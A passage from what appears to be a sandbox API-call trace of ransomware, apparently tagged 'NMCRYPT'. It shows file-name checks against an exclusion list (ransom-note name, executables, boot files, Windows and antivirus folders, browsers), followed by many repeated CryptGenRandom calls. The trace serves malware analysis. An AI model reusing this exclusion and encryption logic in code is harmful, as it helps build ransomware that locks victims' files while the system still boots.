lpFindFileData=0x2d7e3bc) returned 1 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*NMCRYPT") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*Recovers your files.html") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*.exe") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*.dll") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*.lnk") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*.bat") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*.ini") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*.msi") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*.scf") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*pagefile.sys*") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*NTUSER.DAT*") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*AppData*") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*\\winrar\\*") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*\\java\\*") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*\\windows\\*") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*\\ESET\\*") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*\\AVG\\*") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*\\AVIRA\\*") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*Atheros*") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*Realtek*") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*bootmgr*") returned 0 [0155.361] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*boot*") returned 0 [0155.362] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*boot*") returned 0 [0155.362] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*CONFIG.SYS*") returned 0 [0155.362] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*IO.SYS*") returned 0 [0155.362] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*MSDOS.SYS*") returned 0 [0155.362] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*NTDETECT.COM*") returned 0 [0155.362] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*ntldr*") returned 0 [0155.362] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*chrome*") returned 0 [0155.362] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*opera*") returned 0 [0155.362] PathMatchSpecW (pszFile="oskclearui.xml", pszSpec="*firefox*") returned 0 [0155.362] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml", pszSpec="*") returned 1 [0155.362] strlen (_Str="NMoreira") returned 0x8 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: 